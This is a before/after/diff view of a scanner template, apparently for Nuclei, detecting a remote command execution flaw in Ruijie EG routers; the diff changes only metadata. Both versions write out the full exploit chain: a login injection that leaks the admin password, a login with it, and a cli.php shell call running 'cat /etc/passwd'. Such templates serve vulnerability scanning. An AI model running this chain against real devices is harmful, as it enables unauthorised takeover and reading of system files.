vulnerabilities/ruijie/ruijie-eg-rce.yaml (before)
id: ruijie-eg-rce

info:
  name: Ruijie EG cli.php RCE
  author: pikpikcu
  severity: critical
  description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin'
    privileges due to a vulnerability in the login screen.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
    - https://www.ruijienetworks.com
  tags: ruijie,rce

requests:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password=admin?show+webmaster+user

      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password={{admin}}

      - |
        POST /cli.php?a=shell HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        notdelay=true&command=cat /etc/passwd

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "nobody:.*:0:0"
        part: body

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: admin
        group: 1
        internal: true
        regex:
          - 'admin ([a-zA-Z0-9#@]+)",'

vulnerabilities/ruijie/ruijie-eg-rce.yaml (after)
id: ruijie-eg-rce

info:
  name: Ruijie EG - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
    - https://www.ruijienetworks.com
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: ruijie,rce

requests:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password=admin?show+webmaster+user

      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin&password={{admin}}

      - |
        POST /cli.php?a=shell HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;charset=UTF-8

        notdelay=true&command=cat /etc/passwd

    cookie-reuse: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - "nobody:.*:0:0"
        part: body

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: admin
        group: 1
        internal: true
        regex:
          - 'admin ([a-zA-Z0-9#@]+)",'

# Enhanced by mp on 2022/06/03

vulnerabilities/ruijie/ruijie-eg-rce.yaml (diff)
@@ -1,14 +1,17 @@
 id: ruijie-eg-rce
 
 info:
-  name: Ruijie EG cli.php RCE
+  name: Ruijie EG - Remote Code Execution
   author: pikpikcu
   severity: critical
-  description: A vulnerability in Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin'
-    privileges due to a vulnerability in the login screen.
+  description: Ruikie EG's cli.php end point allows remote unauthenticated attackers to gain 'admin' privileges. The vulnerability is exploitable because an unauthenticated user can gain 'admin' privileges due to a vulnerability in the login screen.
   reference:
     - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7EG%E6%98%93%E7%BD%91%E5%85%B3%20cli.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
     - https://www.ruijienetworks.com
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cwe-id: CWE-77
   tags: ruijie,rce
 
 requests:
@@ -54,3 +57,5 @@ requests:
         internal: true
         regex:
           - 'admin ([a-zA-Z0-9#@]+)",'
+
+# Enhanced by mp on 2022/06/03
